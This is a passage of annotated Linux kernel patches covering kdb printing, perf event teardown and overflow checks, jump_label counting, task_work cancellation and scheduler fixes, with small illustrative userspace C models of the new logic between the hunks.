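All of the call sites above move from the fragile "len >= PATH_MAX implies
truncation" convention to checking the -E2BIG that kernfs_path_from_node()
now returns, translating it into the user-visible error (-ENAMETOOLONG for
the /proc files, -ERANGE for cgroup_show_path). The /proc variant, stated
compactly; map_path_err() is an illustrative helper, not kernel code:

#include <errno.h>

static int map_path_err(int retval)
{
	if (retval == -E2BIG)		/* buffer too small for the path */
		return -ENAMETOOLONG;	/* the errno userspace expects */
	return retval;	/* length on success, other -errno on failure */
}
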
+diff --git a/kernel/debug/kdb/kdb_io.c b/kernel/debug/kdb/kdb_io.c
+index b1f79d5a5a60e..d545abe080876 100644
+--- a/kernel/debug/kdb/kdb_io.c
++++ b/kernel/debug/kdb/kdb_io.c
+@@ -193,7 +193,7 @@ char kdb_getchar(void)
+  */
+ static void kdb_position_cursor(char *prompt, char *buffer, char *cp)
+ {
+-	kdb_printf("\r%s", kdb_prompt_str);
++	kdb_printf("\r%s", prompt);
+ 	if (cp > buffer)
+ 		kdb_printf("%.*s", (int)(cp - buffer), buffer);
+ }
+@@ -357,7 +357,7 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			if (i >= dtab_count)
+ 				kdb_printf("...");
+ 			kdb_printf("\n");
+-			kdb_printf(kdb_prompt_str);
++			kdb_printf("%s", kdb_prompt_str);
+ 			kdb_printf("%s", buffer);
+ 			if (cp != lastchar)
+ 				kdb_position_cursor(kdb_prompt_str, buffer, cp);
+@@ -449,7 +449,7 @@ char *kdb_getstr(char *buffer, size_t bufsize, const char *prompt)
+ {
+ 	if (prompt && kdb_prompt_str != prompt)
+ 		strscpy(kdb_prompt_str, prompt, CMD_BUFLEN);
+-	kdb_printf(kdb_prompt_str);
++	kdb_printf("%s", kdb_prompt_str);
+ 	kdb_nextline = 1;	/* Prompt and input resets line number */
+ 	return kdb_read(buffer, bufsize);
+ }
+diff --git a/kernel/dma/mapping.c b/kernel/dma/mapping.c
+index 33437d6206445..f1051ad0da7cc 100644
+--- a/kernel/dma/mapping.c
++++ b/kernel/dma/mapping.c
+@@ -63,8 +63,8 @@ void dmam_free_coherent(struct device *dev, size_t size, void *vaddr,
+ {
+ 	struct dma_devres match_data = { size, vaddr, dma_handle };
+ 
+-	dma_free_coherent(dev, size, vaddr, dma_handle);
+ 	WARN_ON(devres_destroy(dev, dmam_release, dmam_match, &match_data));
++	dma_free_coherent(dev, size, vaddr, dma_handle);
+ }
+ EXPORT_SYMBOL(dmam_free_coherent);
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 413a69aecf5c7..ba099d5b41cd9 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -2316,18 +2316,14 @@ event_sched_out(struct perf_event *event,
+ 	}
+ 
+ 	if (event->pending_sigtrap) {
+-		bool dec = true;
+-
+ 		event->pending_sigtrap = 0;
+ 		if (state != PERF_EVENT_STATE_OFF &&
+-		    !event->pending_work) {
++		    !event->pending_work &&
++		    !task_work_add(current, &event->pending_task, TWA_RESUME)) {
+ 			event->pending_work = 1;
+-			dec = false;
+-			WARN_ON_ONCE(!atomic_long_inc_not_zero(&event->refcount));
+-			task_work_add(current, &event->pending_task, TWA_RESUME);
+-		}
+-		if (dec)
++		} else {
+ 			local_dec(&event->ctx->nr_pending);
++		}
+ 	}
+ 
+ 	perf_event_set_state(event, state);
+@@ -5007,9 +5003,35 @@ static bool exclusive_event_installable(struct perf_event *event,
+ static void perf_addr_filters_splice(struct perf_event *event,
+ 				       struct list_head *head);
+ 
++static void perf_pending_task_sync(struct perf_event *event)
++{
++	struct callback_head *head = &event->pending_task;
++
++	if (!event->pending_work)
++		return;
++	/*
++	 * If the work is queued to the current task's queue, we
++	 * obviously can't wait for it to complete. Simply cancel it.
++	 */
++	if (task_work_cancel(current, head)) {
++		event->pending_work = 0;
++		local_dec(&event->ctx->nr_pending);
++		return;
++	}
++
++	/*
++	 * All accesses related to the event are within the same
++	 * non-preemptible section in perf_pending_task(). The RCU
++	 * grace period before the event is freed will make sure all
++	 * those accesses are complete by then.
++	 */
++	rcuwait_wait_event(&event->pending_work_wait, !event->pending_work, TASK_UNINTERRUPTIBLE);
++}
++
+ static void _free_event(struct perf_event *event)
+ {
+ 	irq_work_sync(&event->pending_irq);
++	perf_pending_task_sync(event);
+ 
+ 	unaccount_event(event);
+ 
+@@ -6307,6 +6329,8 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 			return -EINVAL;
+ 
+ 		nr_pages = vma_size / PAGE_SIZE;
++		if (nr_pages > INT_MAX)
++			return -ENOMEM;
+ 
+ 		mutex_lock(&event->mmap_mutex);
+ 		ret = -EINVAL;
+@@ -6637,24 +6661,28 @@ static void perf_pending_task(struct callback_head *head)
+ 	struct perf_event *event = container_of(head, struct perf_event, pending_task);
+ 	int rctx;
+ 
++	/*
++	 * All accesses to the event must belong to the same implicit RCU read-side
++	 * critical section as the ->pending_work reset. See comment in
++	 * perf_pending_task_sync().
++	 */
++	preempt_disable_notrace();
+ 	/*
+ 	 * If we 'fail' here, that's OK, it means recursion is already disabled
+ 	 * and we won't recurse 'further'.
+ 	 */
+-	preempt_disable_notrace();
+ 	rctx = perf_swevent_get_recursion_context();
+ 
+ 	if (event->pending_work) {
+ 		event->pending_work = 0;
+ 		perf_sigtrap(event);
+ 		local_dec(&event->ctx->nr_pending);
++		rcuwait_wake_up(&event->pending_work_wait);
+ 	}
+ 
+ 	if (rctx >= 0)
+ 		perf_swevent_put_recursion_context(rctx);
+ 	preempt_enable_notrace();
+-
+-	put_event(event);
+ }
+ 
+ #ifdef CONFIG_GUEST_PERF_EVENTS
+@@ -9095,21 +9123,19 @@ static void perf_event_bpf_emit_ksymbols(struct bpf_prog *prog,
+ 	bool unregister = type == PERF_BPF_EVENT_PROG_UNLOAD;
+ 	int i;
+ 
+-	if (prog->aux->func_cnt == 0) {
+-		perf_event_ksymbol(PERF_RECORD_KSYMBOL_TYPE_BPF,
+-				   (u64)(unsigned long)prog->bpf_func,
+-				   prog->jited_len, unregister,
+-				   prog->aux->ksym.name);
+-	} else {
+-		for (i = 0; i < prog->aux->func_cnt; i++) {
+-			struct bpf_prog *subprog = prog->aux->func[i];
+-
+-			perf_event_ksymbol(
+-				PERF_RECORD_KSYMBOL_TYPE_BPF,
+-				(u64)(unsigned long)subprog->bpf_func,
+-				subprog->jited_len, unregister,
+-				subprog->aux->ksym.name);
+-		}
++	perf_event_ksymbol(PERF_RECORD_KSYMBOL_TYPE_BPF,
++			   (u64)(unsigned long)prog->bpf_func,
++			   prog->jited_len, unregister,
++			   prog->aux->ksym.name);
++
++	for (i = 1; i < prog->aux->func_cnt; i++) {
++		struct bpf_prog *subprog = prog->aux->func[i];
++
++		perf_event_ksymbol(
++			PERF_RECORD_KSYMBOL_TYPE_BPF,
++			(u64)(unsigned long)subprog->bpf_func,
++			subprog->jited_len, unregister,
++			subprog->aux->ksym.name);
+ 	}
+ }
+ 
+@@ -11780,6 +11806,7 @@ perf_event_alloc(struct perf_event_attr *attr, int cpu,
+ 	init_waitqueue_head(&event->waitq);
+ 	init_irq_work(&event->pending_irq, perf_pending_irq);
+ 	init_task_work(&event->pending_task, perf_pending_task);
++	rcuwait_init(&event->pending_work_wait);
+ 
+ 	mutex_init(&event->mmap_mutex);
+ 	raw_spin_lock_init(&event->addr_filters.lock);
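
The new teardown rule is "cancel the task work if it is still queued,
otherwise sleep until the handler has finished", with rcuwait providing
the sleep/wake pair and pending_work as the handoff flag. A rough pthread
model of the same protocol; the locking is coarser than the kernel's
lockless task_work list, and all names here are illustrative:

#include <pthread.h>
#include <stdbool.h>

/* Assumes the struct is set up with PTHREAD_*_INITIALIZER and that both
 * flags are set to true when the work is queued. */
struct pending {
	pthread_mutex_t lock;
	pthread_cond_t done;
	bool queued;		/* not started yet, still cancelable */
	bool pending_work;	/* handler has not completed yet */
};

/* Worker side: mirrors perf_pending_task() clearing pending_work and
 * waking the synchronizer when the handler is done. */
static void pending_run(struct pending *p, void (*handler)(void))
{
	pthread_mutex_lock(&p->lock);
	bool run = p->queued;
	p->queued = false;
	pthread_mutex_unlock(&p->lock);

	if (!run)
		return;		/* cancelled before it ever ran */

	handler();

	pthread_mutex_lock(&p->lock);
	p->pending_work = false;
	pthread_cond_broadcast(&p->done);
	pthread_mutex_unlock(&p->lock);
}

/* Teardown side: mirrors perf_pending_task_sync(). */
static void pending_sync(struct pending *p)
{
	pthread_mutex_lock(&p->lock);
	if (p->queued) {		/* cancel before it ever runs */
		p->queued = false;
		p->pending_work = false;
	}
	while (p->pending_work)		/* otherwise wait for completion */
		pthread_cond_wait(&p->done, &p->lock);
	pthread_mutex_unlock(&p->lock);
}
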
+diff --git a/kernel/events/internal.h b/kernel/events/internal.h
+index 5150d5f84c033..386d21c7edfa0 100644
+--- a/kernel/events/internal.h
++++ b/kernel/events/internal.h
+@@ -128,7 +128,7 @@ static inline unsigned long perf_data_size(struct perf_buffer *rb)
+ 
+ static inline unsigned long perf_aux_size(struct perf_buffer *rb)
+ {
+-	return rb->aux_nr_pages << PAGE_SHIFT;
++	return (unsigned long)rb->aux_nr_pages << PAGE_SHIFT;
+ }
+ 
+ #define __DEFINE_OUTPUT_COPY_BODY(advance_buf, memcpy_func, ...)	\
+diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c
+index 45965f13757e4..f3a3c294ff2b3 100644
+--- a/kernel/events/ring_buffer.c
++++ b/kernel/events/ring_buffer.c
+@@ -683,7 +683,9 @@ int rb_alloc_aux(struct perf_buffer *rb, struct perf_event *event,
+ 		 * max_order, to aid PMU drivers in double buffering.
+ 		 */
+ 		if (!watermark)
+-			watermark = nr_pages << (PAGE_SHIFT - 1);
++			watermark = min_t(unsigned long,
++					  U32_MAX,
++					  (unsigned long)nr_pages << (PAGE_SHIFT - 1));
+ 
+ 		/*
+ 		 * Use aux_watermark as the basis for chunking to
+diff --git a/kernel/irq/manage.c b/kernel/irq/manage.c
+index 40fe7806cc8c9..a5843563d0154 100644
+--- a/kernel/irq/manage.c
++++ b/kernel/irq/manage.c
+@@ -1324,7 +1324,7 @@ static int irq_thread(void *data)
+ 	 * synchronize_hardirq(). So neither IRQTF_RUNTHREAD nor the
+ 	 * oneshot mask bit can be set.
+ 	 */
+-	task_work_cancel(current, irq_thread_dtor);
++	task_work_cancel_func(current, irq_thread_dtor);
+ 	return 0;
+ }
+ 
+diff --git a/kernel/jump_label.c b/kernel/jump_label.c
+index 714ac4c3b556d..eec802175ccc6 100644
+--- a/kernel/jump_label.c
++++ b/kernel/jump_label.c
+@@ -113,30 +113,51 @@ int static_key_count(struct static_key *key)
+ }
+ EXPORT_SYMBOL_GPL(static_key_count);
+ 
+-void static_key_slow_inc_cpuslocked(struct static_key *key)
++/*
++ * static_key_fast_inc_not_disabled - adds a user for a static key
++ * @key: static key that must be already enabled
++ *
++ * The caller must make sure that the static key can't get disabled while
++ * in this function. It doesn't patch jump labels, only adds a user to
++ * an already enabled static key.
++ *
++ * Returns true if the increment was done. Unlike refcount_t the ref counter
++ * is not saturated, but will fail to increment on overflow.
++ */
++bool static_key_fast_inc_not_disabled(struct static_key *key)
+ {
+-	int v, v1;
++	int v;
+ 
+ 	STATIC_KEY_CHECK_USE(key);
++	/*
++	 * Negative key->enabled has a special meaning: it sends
++	 * static_key_slow_inc/dec() down the slow path, and it is non-zero
++	 * so it counts as "enabled" in jump_label_update().  Note that
++	 * atomic_inc_unless_negative() checks >= 0, so roll our own.
++	 */
++	v = atomic_read(&key->enabled);
++	do {
++		if (v <= 0 || (v + 1) < 0)
++			return false;
++	} while (!likely(atomic_try_cmpxchg(&key->enabled, &v, v + 1)));
++
++	return true;
++}
++EXPORT_SYMBOL_GPL(static_key_fast_inc_not_disabled);
++
++bool static_key_slow_inc_cpuslocked(struct static_key *key)
++{
+ 	lockdep_assert_cpus_held();
+ 
+ 	/*
+-	 * Careful if we get concurrent static_key_slow_inc() calls;
++	 * Careful if we get concurrent static_key_slow_inc/dec() calls;
+ 	 * later calls must wait for the first one to _finish_ the
+ 	 * jump_label_update() process.  At the same time, however,
+ 	 * the jump_label_update() call below wants to see
+ 	 * static_key_enabled(&key) for jumps to be updated properly.
+-	 *
+-	 * So give a special meaning to negative key->enabled: it sends
+-	 * static_key_slow_inc() down the slow path, and it is non-zero
+-	 * so it counts as "enabled" in jump_label_update().  Note that
+-	 * atomic_inc_unless_negative() checks >= 0, so roll our own.
+ 	 */
+-	for (v = atomic_read(&key->enabled); v > 0; v = v1) {
+-		v1 = atomic_cmpxchg(&key->enabled, v, v + 1);
+-		if (likely(v1 == v))
+-			return;
+-	}
++	if (static_key_fast_inc_not_disabled(key))
++		return true;
+ 
+ 	jump_label_lock();
+ 	if (atomic_read(&key->enabled) == 0) {
+@@ -148,16 +169,23 @@ void static_key_slow_inc_cpuslocked(struct static_key *key)
+ 		 */
+ 		atomic_set_release(&key->enabled, 1);
+ 	} else {
+-		atomic_inc(&key->enabled);
++		if (WARN_ON_ONCE(!static_key_fast_inc_not_disabled(key))) {
++			jump_label_unlock();
++			return false;
++		}
+ 	}
+ 	jump_label_unlock();
++	return true;
+ }
+ 
+-void static_key_slow_inc(struct static_key *key)
++bool static_key_slow_inc(struct static_key *key)
+ {
++	bool ret;
++
+ 	cpus_read_lock();
+-	static_key_slow_inc_cpuslocked(key);
++	ret = static_key_slow_inc_cpuslocked(key);
+ 	cpus_read_unlock();
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(static_key_slow_inc);
+ 
+@@ -219,20 +247,32 @@ EXPORT_SYMBOL_GPL(static_key_disable);
+ 
+ static bool static_key_slow_try_dec(struct static_key *key)
+ {
+-	int val;
+-
+-	val = atomic_fetch_add_unless(&key->enabled, -1, 1);
+-	if (val == 1)
+-		return false;
++	int v;
+ 
+ 	/*
+-	 * The negative count check is valid even when a negative
+-	 * key->enabled is in use by static_key_slow_inc(); a
+-	 * __static_key_slow_dec() before the first static_key_slow_inc()
+-	 * returns is unbalanced, because all other static_key_slow_inc()
+-	 * instances block while the update is in progress.
++	 * Go into the slow path if key::enabled is less than or equal to
++	 * one. One is valid to shut down the key; anything less than one
++	 * is an imbalance, which is handled at the call site.
++	 *
++	 * That includes the special case of '-1' which is set in
++	 * static_key_slow_inc_cpuslocked(), but that's harmless as it is
++	 * fully serialized in the slow path below. By the time this task
++	 * acquires the jump label lock the value is back to one and the
++	 * retry under the lock must succeed.
+ 	 */
+-	WARN(val < 0, "jump label: negative count!\n");
++	v = atomic_read(&key->enabled);
++	do {
++		/*
++		 * Warn about the '-1' case though, since that means a
++		 * decrement is concurrent with a first (0->1) increment. IOW
++		 * people are trying to disable something that wasn't yet fully
++		 * enabled. This suggests an ordering problem on the user side.
++		 */
++		WARN_ON_ONCE(v < 0);
++		if (v <= 1)
++			return false;
++	} while (!likely(atomic_try_cmpxchg(&key->enabled, &v, v - 1)));
++
+ 	return true;
+ }
+ 
+@@ -243,10 +283,11 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
+ 	if (static_key_slow_try_dec(key))
+ 		return;
+ 
+-	jump_label_lock();
+-	if (atomic_dec_and_test(&key->enabled))
++	guard(mutex)(&jump_label_mutex);
++	if (atomic_cmpxchg(&key->enabled, 1, 0))
+ 		jump_label_update(key);
+-	jump_label_unlock();
++	else
++		WARN_ON_ONCE(!static_key_slow_try_dec(key));
+ }
+ 
+ static void __static_key_slow_dec(struct static_key *key)
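
At the heart of static_key_fast_inc_not_disabled() is a compare-and-swap
loop that rejects both the disabled/in-transition states (enabled <= 0)
and counter overflow. A userspace model using C11 atomics; since signed
overflow is undefined behavior in portable C, the overflow guard is
written as v == INT_MAX instead of the kernel's (v + 1) < 0 test:

#include <stdatomic.h>
#include <stdbool.h>
#include <limits.h>

static bool fast_inc_not_disabled(atomic_int *enabled)
{
	int v = atomic_load(enabled);

	do {
		/* 0 means disabled, negative means a slow-path update
		 * is in flight; both must take the slow path instead. */
		if (v <= 0 || v == INT_MAX)
			return false;
		/* On failure the observed value is reloaded into v,
		 * just like the kernel's atomic_try_cmpxchg(). */
	} while (!atomic_compare_exchange_weak(enabled, &v, v + 1));

	return true;
}
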
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 92d8e2c4edda0..ffc2bbe391879 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -1308,7 +1308,7 @@ static inline int __down_read_trylock(struct rw_semaphore *sem)
+ /*
+  * lock for writing
+  */
+-static inline int __down_write_common(struct rw_semaphore *sem, int state)
++static __always_inline int __down_write_common(struct rw_semaphore *sem, int state)
+ {
+ 	if (unlikely(!rwsem_write_trylock(sem))) {
+ 		if (IS_ERR(rwsem_down_write_slowpath(sem, state)))
+@@ -1318,12 +1318,12 @@ static inline int __down_write_common(struct rw_semaphore *sem, int state)
+ 	return 0;
+ }
+ 
+-static inline void __down_write(struct rw_semaphore *sem)
++static __always_inline void __down_write(struct rw_semaphore *sem)
+ {
+ 	__down_write_common(sem, TASK_UNINTERRUPTIBLE);
+ }
+ 
+-static inline int __down_write_killable(struct rw_semaphore *sem)
++static __always_inline int __down_write_killable(struct rw_semaphore *sem)
+ {
+ 	return __down_write_common(sem, TASK_KILLABLE);
+ }
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index 6f48f565e3acb..456c956f481ef 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -1531,6 +1531,16 @@ static void rcu_tasks_trace_pregp_step(struct list_head *hop)
+ 	// allow safe access to the hop list.
+ 	for_each_online_cpu(cpu) {
+ 		rcu_read_lock();
++		// Note that cpu_curr_snapshot() picks up the target
++		// CPU's current task while its runqueue is locked with
++		// an smp_mb__after_spinlock().  This ensures that either
++		// the grace-period kthread will see that task's read-side
++		// critical section or the task will see the updater's pre-GP
++		// accesses.  The trailing smp_mb() in cpu_curr_snapshot()
++		// does not currently play a role other than simplify
++		// that function's ordering semantics.  If these simplified
++		// ordering semantics continue to be redundant, that smp_mb()
++		// might be removed.
+ 		t = cpu_curr_snapshot(cpu);
+ 		if (rcu_tasks_trace_pertask_prep(t, true))
+ 			trc_add_holdout(t, hop);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index cac41c49bd2f5..4a96bf1d2f37c 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -1259,27 +1259,24 @@ int tg_nop(struct task_group *tg, void *data)
+ static void set_load_weight(struct task_struct *p, bool update_load)
+ {
+ 	int prio = p->static_prio - MAX_RT_PRIO;
+-	struct load_weight *load = &p->se.load;
++	struct load_weight lw;
+ 
+-	/*
+-	 * SCHED_IDLE tasks get minimal weight:
+-	 */
+ 	if (task_has_idle_policy(p)) {
+-		load->weight = scale_load(WEIGHT_IDLEPRIO);
+-		load->inv_weight = WMULT_IDLEPRIO;
+-		return;
++		lw.weight = scale_load(WEIGHT_IDLEPRIO);
++		lw.inv_weight = WMULT_IDLEPRIO;
++	} else {
++		lw.weight = scale_load(sched_prio_to_weight[prio]);
++		lw.inv_weight = sched_prio_to_wmult[prio];
+ 	}
+ 
+ 	/*
+ 	 * SCHED_OTHER tasks have to update their load when changing their
+ 	 * weight
+ 	 */
+-	if (update_load && p->sched_class == &fair_sched_class) {
+-		reweight_task(p, prio);
+-	} else {
+-		load->weight = scale_load(sched_prio_to_weight[prio]);
+-		load->inv_weight = sched_prio_to_wmult[prio];
+-	}
++	if (update_load && p->sched_class == &fair_sched_class)
++		reweight_task(p, &lw);
++	else
++		p->se.load = lw;
+ }
+ 
+ #ifdef CONFIG_UCLAMP_TASK
+@@ -4318,12 +4315,7 @@ int task_call_func(struct task_struct *p, task_call_f func, void *arg)
+  * @cpu: The CPU on which to snapshot the task.
+  *
+  * Returns the task_struct pointer of the task "currently" running on
+- * the specified CPU.  If the same task is running on that CPU throughout,
+- * the return value will be a pointer to that task's task_struct structure.
+- * If the CPU did any context switches even vaguely concurrently with the
+- * execution of this function, the return value will be a pointer to the
+- * task_struct structure of a randomly chosen task that was running on
+- * that CPU somewhere around the time that this function was executing.
++ * the specified CPU.
+  *
+  * If the specified CPU was offline, the return value is whatever it
+  * is, perhaps a pointer to the task_struct structure of that CPU's idle
+@@ -4337,11 +4329,16 @@ int task_call_func(struct task_struct *p, task_call_f func, void *arg)
+  */
+ struct task_struct *cpu_curr_snapshot(int cpu)
+ {
++	struct rq *rq = cpu_rq(cpu);
+ 	struct task_struct *t;
++	struct rq_flags rf;
+ 
+-	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	rq_lock_irqsave(rq, &rf);
++	smp_mb__after_spinlock(); /* Pairing determined by caller's synchronization design. */
+ 	t = rcu_dereference(cpu_curr(cpu));
++	rq_unlock_irqrestore(rq, &rf);
+ 	smp_mb(); /* Pairing determined by caller's synchronization design. */
++
+ 	return t;
+ }
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index d0851610cf467..1e12f731a0337 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -3330,15 +3330,14 @@ static void reweight_entity(struct cfs_rq *cfs_rq, struct sched_entity *se,
+ 
+ }
+ 
+-void reweight_task(struct task_struct *p, int prio)
++void reweight_task(struct task_struct *p, const struct load_weight *lw)
+ {
+ 	struct sched_entity *se = &p->se;
+ 	struct cfs_rq *cfs_rq = cfs_rq_of(se);
+ 	struct load_weight *load = &se->load;
+-	unsigned long weight = scale_load(sched_prio_to_weight[prio]);
+ 
+-	reweight_entity(cfs_rq, se, weight);
+-	load->inv_weight = sched_prio_to_wmult[prio];
++	reweight_entity(cfs_rq, se, lw->weight);
++	load->inv_weight = lw->inv_weight;
+ }
+ 
+ static inline int throttled_hierarchy(struct cfs_rq *cfs_rq);
+@@ -8525,7 +8524,7 @@ static int detach_tasks(struct lb_env *env)
+ 		case migrate_util:
+ 			util = task_util_est(p);
+ 
+-			if (util > env->imbalance)
++			if (shr_bound(util, env->sd->nr_balance_failed) > env->imbalance)
+ 				goto next;
+ 
+ 			env->imbalance -= util;
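
The migrate_util change relies on shr_bound(), the kernel's shift-right
helper that clamps the shift count to the width of the type. Each failed
balance attempt halves the utilization a candidate task is considered to
have, so a stubborn imbalance eventually becomes movable. A standalone
model of the clamped shift (shr_bound_model() is an illustrative name):

static unsigned long shr_bound_model(unsigned long val, unsigned int shift)
{
	unsigned int max = 8 * sizeof(val) - 1;

	/* Clamp so the shift stays defined even for huge counts. */
	return val >> (shift > max ? max : shift);
}
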
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index 81d9698f0a1eb..f0c3d0d4a0dd5 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -2346,7 +2346,7 @@ extern void init_sched_dl_class(void);
+ extern void init_sched_rt_class(void);
+ extern void init_sched_fair_class(void);
+ 
+-extern void reweight_task(struct task_struct *p, int prio);
++extern void reweight_task(struct task_struct *p, const struct load_weight *lw);
+ 
+ extern void resched_curr(struct rq *rq);
+ extern void resched_cpu(int cpu);
+diff --git a/kernel/signal.c b/kernel/signal.c
+index 5d45f5da2b36e..4bebd2443cc3a 100644
+--- a/kernel/signal.c
++++ b/kernel/signal.c
+@@ -2558,6 +2558,14 @@ static void do_freezer_trap(void)
+ 	spin_unlock_irq(&current->sighand->siglock);
+ 	cgroup_enter_frozen();
+ 	schedule();
++
++	/*
++	 * We could've been woken by task_work, run it to clear
++	 * TIF_NOTIFY_SIGNAL. The caller will retry if necessary.
++	 */
++	clear_notify_signal();
++	if (unlikely(task_work_pending(current)))
++		task_work_run();
+ }
+ 
+ static int ptrace_signal(int signr, kernel_siginfo_t *info, enum pid_type type)
+diff --git a/kernel/task_work.c b/kernel/task_work.c
+index 065e1ef8fc8d7..ffba54734cdb4 100644
+--- a/kernel/task_work.c
++++ b/kernel/task_work.c
+@@ -119,9 +119,9 @@ static bool task_work_func_match(struct callback_head *cb, void *data)
+ }
+ 
+ /**
+- * task_work_cancel - cancel a pending work added by task_work_add()
+- * @task: the task which should execute the work
+- * @func: identifies the work to remove
++ * task_work_cancel_func - cancel a pending work matching a function added by task_work_add()
++ * @task: the task which should execute the work
++ * @func: identifies the function of the work to remove
+  *
+  * Find the last queued pending work with ->func == @func and remove
+  * it from the queue.
+@@ -130,11 +130,35 @@ static bool task_work_func_match(struct callback_head *cb, void *data)
+  * The found work or NULL if not found.
+  */
+ struct callback_head *
+-task_work_cancel(struct task_struct *task, task_work_func_t func)
++task_work_cancel_func(struct task_struct *task, task_work_func_t func)
+ {
+ 	return task_work_cancel_match(task, task_work_func_match, func);
+ }
+ 
++static bool task_work_match(struct callback_head *cb, void *data)
++{
++	return cb == data;
++}
++
++/**
++ * task_work_cancel - cancel a pending work added by task_work_add()
++ * @task: the task which should execute the work
++ * @cb: the callback to remove if queued
++ *
++ * Remove a callback from a task's queue if queued.
++ *
++ * RETURNS:
++ * True if the callback was queued and got cancelled, false otherwise.
++ */
++bool task_work_cancel(struct task_struct *task, struct callback_head *cb)
++{
++	struct callback_head *ret;
++
++	ret = task_work_cancel_match(task, task_work_match, cb);
++
++	return ret == cb;
++}
++
+ /**
+  * task_work_run - execute the works added by task_work_add()
+  *
+@@ -167,7 +191,7 @@ void task_work_run(void)
+ 		if (!work)
+ 			break;
+ 		/*
+-		 * Synchronize with task_work_cancel(). It can not remove
++		 * Synchronize with task_work_cancel_match(). It can not remove
+ 		 * the first entry == work, cmpxchg(task_works) must fail.
+ 		 * But it can remove another entry from the ->next list.
+ 		 */
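
task_work_cancel() now identifies work by callback pointer rather than by
function, which matters when several queued callbacks share one function.
The matcher-based removal, modeled over a plain singly linked list (the
kernel walks a lockless cmpxchg-based stack instead):

#include <stdbool.h>
#include <stddef.h>

struct callback_head {
	struct callback_head *next;
	void (*func)(struct callback_head *);
};

/* Pointer-identity matcher, mirroring the new task_work_match(). */
static bool match_exact(struct callback_head *cb, void *data)
{
	return cb == data;
}

static struct callback_head *
cancel_match(struct callback_head **head,
	     bool (*match)(struct callback_head *, void *), void *data)
{
	for (struct callback_head **p = head; *p; p = &(*p)->next) {
		if (match(*p, data)) {
			struct callback_head *found = *p;
			*p = found->next;	/* unlink and return it */
			return found;
		}
	}
	return NULL;
}

static bool cancel_cb(struct callback_head **head, struct callback_head *cb)
{
	return cancel_match(head, match_exact, cb) == cb;
}

cancel_cb() returns true only when that exact callback_head was still
queued, which is the guarantee the perf teardown path above depends on.
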
+diff --git a/kernel/time/tick-broadcast.c b/kernel/time/tick-broadcast.c
+index 0916cc9adb828..ba551ec546f52 100644
+--- a/kernel/time/tick-broadcast.c
++++ b/kernel/time/tick-broadcast.c
+@@ -1137,6 +1137,7 @@ void tick_broadcast_switch_to_oneshot(void)
+ #ifdef CONFIG_HOTPLUG_CPU
+ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ {
++	struct tick_device *td = this_cpu_ptr(&tick_cpu_device);
+ 	struct clock_event_device *bc;
+ 	unsigned long flags;
+ 
+@@ -1144,6 +1145,28 @@ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ 	bc = tick_broadcast_device.evtdev;
+ 
+ 	if (bc && broadcast_needs_cpu(bc, deadcpu)) {
++		/*
++		 * If the broadcast force bit of the current CPU is set,
++		 * then the current CPU has not yet reprogrammed the local
++		 * timer device to avoid a ping-pong race. See
++		 * ___tick_broadcast_oneshot_control().
++		 *
++		 * If the broadcast device is hrtimer based then
++		 * programming the broadcast event below does not have any
++		 * effect because the local clockevent device is not
++		 * running and not programmed because the broadcast event
++		 * is not earlier than the pending event of the local clock
++		 * event device. As a consequence all CPUs waiting for a
++		 * broadcast event are stuck forever.
++		 *
++		 * Detect this condition and reprogram the cpu local timer
++		 * device to avoid the starvation.
++		 */
++		if (tick_check_broadcast_expired()) {
++			cpumask_clear_cpu(smp_processor_id(), tick_broadcast_force_mask);
++			tick_program_event(td->evtdev->next_event, 1);
++		}
++
+ 		/* This moves the broadcast assignment to this CPU: */
+ 		clockevents_program_event(bc, bc->next_event, 1);
+ 	}
+diff --git a/kernel/trace/pid_list.c b/kernel/trace/pid_list.c
+index 95106d02b32d8..85de221c0b6f2 100644
+--- a/kernel/trace/pid_list.c
++++ b/kernel/trace/pid_list.c
+@@ -354,7 +354,7 @@ static void pid_list_refill_irq(struct irq_work *iwork)
+ 	while (upper_count-- > 0) {
+ 		union upper_chunk *chunk;
+ 
+-		chunk = kzalloc(sizeof(*chunk), GFP_KERNEL);
++		chunk = kzalloc(sizeof(*chunk), GFP_NOWAIT);
+ 		if (!chunk)
+ 			break;
+ 		*upper_next = chunk;
+@@ -365,7 +365,7 @@ static void pid_list_refill_irq(struct irq_work *iwork)
+ 	while (lower_count-- > 0) {
+ 		union lower_chunk *chunk;
+ 
+-		chunk = kzalloc(sizeof(*chunk), GFP_KERNEL);
++		chunk = kzalloc(sizeof(*chunk), GFP_NOWAIT);
+ 		if (!chunk)
+ 			break;
+ 		*lower_next = chunk;
+diff --git a/kernel/watchdog_hld.c b/kernel/watchdog_hld.c
+index 1e8a49dc956e2..8ba4b269ab89c 100644
+--- a/kernel/watchdog_hld.c
++++ b/kernel/watchdog_hld.c
+@@ -91,11 +91,15 @@ static bool watchdog_check_timestamp(void)
+ 	__this_cpu_write(last_timestamp, now);
+ 	return true;
+ }
+-#else
+-static inline bool watchdog_check_timestamp(void)
++
++static void watchdog_init_timestamp(void)
+ {
+-	return true;
++	__this_cpu_write(nmi_rearmed, 0);
++	__this_cpu_write(last_timestamp, ktime_get_mono_fast_ns());
+ }
++#else
++static inline bool watchdog_check_timestamp(void) { return true; }
++static inline void watchdog_init_timestamp(void) { }
+ #endif
+ 
+ static struct perf_event_attr wd_hw_attr = {
